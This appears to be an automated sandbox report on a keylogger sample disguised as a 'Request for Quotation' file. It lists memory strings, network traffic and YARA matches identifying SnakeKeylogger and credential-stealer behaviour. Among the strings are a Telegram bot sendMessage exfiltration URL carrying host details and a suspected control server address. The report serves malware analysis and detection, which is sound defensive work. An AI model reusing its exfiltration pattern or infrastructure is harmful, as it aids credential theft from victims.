Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3841092416.00000000069A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/C5
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000310A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000A.00000002.1469660734.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr	String found in binary or memory: http://tempuri.org/ianiDataSet.xsd
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr	String found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, NuDUTBObHpKADz.exe.0.dr	String found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003247000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003120000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.000000000286E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000314A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000318F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002903000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.00000000028DD000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.000000000438F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3837553643.0000000004373000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.000000000326E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/0
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3829829868.0000000003278000.00000004.00000800.00020000.00000000.sdmp, NuDUTBObHpKADz.exe, 0000000E.00000002.3830047300.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\0009\
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\PerfStringBackup.TMP

Source: C:\Windows\System32\wbem\WMIADAP.exe

File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_0153D51C	0_2_0153D51C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_0741CD7B	0_2_0741CD7B
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_07415350	0_2_07415350
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_074173A8	0_2_074173A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_07414F18	0_2_07414F18
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_07416E8A	0_2_07416E8A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_07416E98	0_2_07416E98
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_07414AE0	0_2_07414AE0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162C19B	9_2_0162C19B
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162A088	9_2_0162A088
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_01625362	9_2_01625362
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162D278	9_2_0162D278
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162D548	9_2_0162D548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162C468	9_2_0162C468
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162C738	9_2_0162C738
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_016269A0	9_2_016269A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162E988	9_2_0162E988
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162CA08	9_2_0162CA08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162CCD8	9_2_0162CCD8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_01626FC8	9_2_01626FC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162CFAC	9_2_0162CFAC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162F961	9_2_0162F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_0162E97C	9_2_0162E97C
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_016229EC	9_2_016229EC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_01623AB1	9_2_01623AB1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_01623E09	9_2_01623E09
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE1E80	9_2_06DE1E80
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE17A0	9_2_06DE17A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE9C70	9_2_06DE9C70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEFC68	9_2_06DEFC68
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE9548	9_2_06DE9548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE0B30	9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE5028	9_2_06DE5028
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE2968	9_2_06DE2968
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEE6B0	9_2_06DEE6B0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEE6A0	9_2_06DEE6A0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE1E70	9_2_06DE1E70
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEDE00	9_2_06DEDE00
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE178F	9_2_06DE178F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEEF51	9_2_06DEEF51
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEEF60	9_2_06DEEF60
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DECC8F	9_2_06DECC8F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DECCA0	9_2_06DECCA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEDDFF	9_2_06DEDDFF
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DED550	9_2_06DED550
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DED540	9_2_06DED540
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEEAF8	9_2_06DEEAF8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEE258	9_2_06DEE258
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEE249	9_2_06DEE249
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE9BFB	9_2_06DE9BFB
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE8B91	9_2_06DE8B91
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEF3B8	9_2_06DEF3B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEF3A8	9_2_06DEF3A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE8BA0	9_2_06DE8BA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEEB08	9_2_06DEEB08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE9328	9_2_06DE9328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE0B20	9_2_06DE0B20
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DED0F8	9_2_06DED0F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE0040	9_2_06DE0040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE5018	9_2_06DE5018
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEF810	9_2_06DEF810
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE0007	9_2_06DE0007
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DEF801	9_2_06DEF801
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DED999	9_2_06DED999
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DED9A8	9_2_06DED9A8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_0111D51C	10_2_0111D51C
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053D5020	10_2_053D5020
